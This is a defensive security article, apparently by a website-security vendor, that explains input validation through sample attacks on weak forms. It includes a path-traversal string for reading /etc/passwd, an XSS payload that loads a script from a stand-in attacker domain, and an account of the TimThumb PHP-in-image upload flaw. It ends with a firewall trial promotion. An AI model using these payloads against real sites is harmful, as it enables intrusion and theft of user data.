Input Validation for Website Security

Web forms are incredibly useful tools. They allow you to gather important information about potential clients and site visitors, collect comments and feedback, upload files, subscribe new users to your blog, or even collect payment details. But if your forms aren’t properly validating user inputs, you might be in for a nasty surprise: a variety of issues can occur if data is uploaded to your site’s environment without specific controls.

In fact, bad actors regularly test forms and enter all sorts of malicious data (including JavaScript or SQL queries) which, if not properly sanitized and validated, can be executed on your website.

So, let’s take a look at what input validation is and why it’s so important — along with some examples of how to ensure proper validation to prevent arbitrary file uploads, cross-site scripting, and SQL injection attacks.

Contents:

What is input validation?
Why is input validation important?
What’s an example of input validation?
Which attacks exploit input validation?
How to implement input validation

What is input validation?

Input validation is a technique used to ensure that data entered into any system, website, or web app is valid and meets specific criteria. It’s typically implemented for websites and web apps that receive and process user-inputs (such as forms) to check for properly formed data. And it’s one of the most essential steps you can take to prevent unexpected behavior on your site.

There are many different types and levels of validation, from syntactic validation (which checks the input, types, and lengths) to semantic validation (which ensures supplied values make sense in the application context).

If a website or app doesn’t perform proper input validation checks, malformed data may be entered to wreak havoc on the system or trigger malfunctions. For this reason, data from all untrusted sources (such as website visitors) should be validated as early as possible to mitigate risk.

Always validate all data from untrusted sources before performing any actions.

As a best practice, input validation should occur on both the client and server levels. While it’s certainly nice to have client side validation, it’s not enough on its own — attackers may pass unvalidated data through a specially crafted HTTP request that totally bypasses the site’s form validations.

So, you’ll want server-side code to check and verify that it’s receiving valid data as soon as it’s been passed from the client side. And be sure to only use it after proper sanitization!

A few guiding principles of input validation include:

Never, ever trust user input.
Validating and rejecting inputs is better than sanitizing them.

So now that we have a general overview of what input validation is, let’s take a look at why we want to use it on our website and web apps.

Why is input validation important?

Input validation is important for three main reasons:

1 – Functionality

By verifying that data inputs are in the correct format and within expected ranges, you can ensure data is received and processed correctly by your website’s back-end. For example, if a user specifies incorrect credit card details on your purchase process, you won’t be able to charge them.

Furthermore, if you process corrupt or invalid data, it could crash your web server — or an application might return incorrect results or simply fail to load.

2 – Security

Validating user inputs is extremely important for website security because it helps prevent bad actors from entering potentially harmful data, mitigating the risk of cross-site scripting (XSS) or SQL injection attacks.

3 – User experience

Input validation can drastically improve user experience by informing users if they have entered invalid data. For example, if a user accidentally provides their name instead of email address in a certain field, input validation can catch the error and inform them of the mistake.

Input validation example:

Let’s take a look at input validation for a new account creation signup form as an example.

Signup form input validation example

To properly validate the user’s input on this signup form, you would want to:

Check that their email address is using the correct format. (i.e. contains an ‘@’ symbol and follows email address syntax rules).
Check that the email address belongs to a valid domain name.
Check that the passwords are longer than 8 characters (or more).
Check that the passwords are not longer than a certain number of characters
Check that the passwords contain a mix of allowed special characters, letters, and numbers.
Check that the passwords match.

If the user’s input does not meet these criteria, you might display an error message and prevent the user from submitting the form until they enter a valid email address. This helps ensure that the website can process the user’s input properly — while also protecting your website from potential attacks that could exploit improperly-validated input.

In summary, not only is validation important for security, but it’s crucial for your site’s functionality and user experience as well. If you process corrupt or invalid data it could crash your web server, return incorrect results, or simply fail to load.

Which attacks exploit improper input validation?

There are several types of attacks that can exploit input validation issues including cross-site scripting (XSS), SQL injection, and remote file inclusion (RFI). Let’s take a look at a few examples of how these attacks may exploit vulnerable websites.

Local file inclusion

Imagine your web app offers a localized version of a document for several predefined countries. Users can select a country in the drop-down box in a web form.

Since the drop-down box provides a limited choice, you might assume it’s a safe input, so on the server side you simply copy the data from /path/to/documents/<country> (where <country> is the drop-down box choice) to the document generated for the visitor.

There is a large gaping hole in this solution, however. Attackers don’t always have to use your forms: they can craft HTTP requests with whatever data they want.

So, instead of a country (e.g. France) your server application may receive something like “../../../etc/passwd” in an HTTP request from a bad actor. And instead of sending along country specific information, you end up passing a list of server users or a configuration file with database passwords.

To mitigate this particular issue, your server application should validate that:

The input doesn’t have any path changing characters.
The input belongs to a predefined set of values (e.g. in this case, check it against a list of known countries).

SQL injection

SQL injection attacks take advantage of improper input validation to insert malicious code into web forms or other user-input fields in an attempt to gain access to the website’s database.

For example, imagine your online store has a form that allows visitors to search for specific products by SKU in the following format: NNN-DDDDD-DD, where N is a capital letter, and D is a digit.

You’ll want to create a validation rule (regex [A-Z]{3}-\d{5}-\d{2} ) to avoid incorrect inputs. If you don’t, your app will not be able to find anything. And if it lacks input sanitization when making a select SQL query, it may lead to undesirable consequences.

Exploiting this scenario could allow a bad actor to enter a malicious SQL query as the search term, which could be executed by the database when the search is performed. This could allow the attacker to gain access to sensitive user information or financial records, or even to modify or delete data in your site’s database.

Cross-site scripting (XSS)

Cross-site scripting (XSS) attacks can take advantage of improperly-validated user input to inject malicious code into your webpage.

As an example, imagine your website’s blog allows users to associate domain URLs with their author name.

You will want to validate that the link they provide is in the correct URL format and doesn’t contain forbidden characters. This will help prevent attackers from adding HTML tags or scripts that execute whenever their author name is displayed on your website.

For example, when a user specifies their name and website address, you expect the generated code to be:

<a href="https://example-user-site.com">commenter name</a>

But if a malicious user specifies something like this instead of the URL, then you’ll have a problem:

https://example-user-site[.]com"></a><script src="https://example-evil-site[.]xyz/xss.js"></script><a href="https://example-user-site[.]com

If your application doesn’t validate and sanitize this input, a malicious script could be injected into the web page with the comment. This will be executed every time someone loads the page, potentially allowing the hacker to perform unauthorized actions including stealing user data, injecting malicious redirects to spam websites, or injecting unwanted spam pop-ups.

Arbitrary file upload

Many sites allow users to upload documents. One of the most common use cases is uploading user profile pictures. But if you don’t check what kind of files a user uploads to your website for their profile picture, you may end up with a bunch of malicious files on your server. For example, backdoors that execute on your server or malicious downloads served off of your server.

One of the most famous cases of a buggy arbitrary file upload vulnerability caused by insufficient user input validation was the TimThumb vulnerability which resulted in hundreds of thousands of infected websites way back in 2011.

The exploit used TimThumb’s feature to create thumbnails of images which had been stored on trusted third-party sites. To resize these images, the files needed to be downloaded and stored in a cache directory so that the script didn’t have to download them every time.

Since TimThumb’s feature worked using a simple GET request (timthumb.php?src=http://trusted-site.tld/image.gif) which could be easily modified to download arbitrary files from the internet, the developer added rules that tried to ensure unwanted files couldn’t be erroneously downloaded. The script checked that the header of the file matched a header of an image file and identified whether the URL matched the list of trusted sites such as blogger.com, flickr.com, picasa.com, upload.wikimedia.org and a few more.

Since TimThumb only checked that the beginning of the URL matched popular lists of sites, the approach completely neglected the possibility that a URL beginning with “http://blogger.com” might not actually belong to the blogger.com site. And this solution didn’t take into account that PHP can ignore anything outside of the <?php ?> tags, allowing hackers to append malicious PHP code to the end of real images which executed whenever the file was requested.

By creating numerous shadow domains that matched domains on TimThumb’s trusted site list, hackers were able to exploit the vulnerability and arbitrarily upload malicious files to affected websites.

How do I implement input validation on a website?

There are a number of steps you can take to implement input validation on your website:

1 – Pinpoint all the different types of data you might need to validate.

This includes form inputs, URL parameters, cookies, or any other user data that’s submitted on your site.

2 – Define appropriate validation rules for each type of data.

For example, you might want to check that all data is in the correct format (i.e. emails contain an @ symbols), does not contain any unauthorized words or characters, and is within a specific range (i.e. passwords are a minimum 8 characters long).

3 – Implement validation rules.

You may need to write some custom code to handle validation at the server level, or use a built-in function or library to perform the validation.

4 – Test your validation rules.

Make sure any rules you make are working properly. So, enter invalid data on your site to ensure it’s properly rejected. And enter valid data to ensure it’s accepted.

5 – Monitor your website’s logs.

Check your website and server logs to verify that rules are being enforced and no malicious data is entered or executed on your site. Consider using a security plugin to help you with this.

Conclusion

As a rule of thumb, never trust data that’s passed to your server from the client side. Leverage input validation to ensure only properly formed data is entering your workflows. This helps prevent attackers from executing malicious query strings or JavaScript on your website. And keep in mind that input validation alone can’t prevent all attacks — but it can help minimize the attack surface as well as the impact that successful attacks have.

As an additional layer of security, consider using a web application firewall (WAF) to help enhance your website’s security and protect against SQL injections, cross-site scripting attacks. Check out our free 1 month Firewall trial and protect your site today.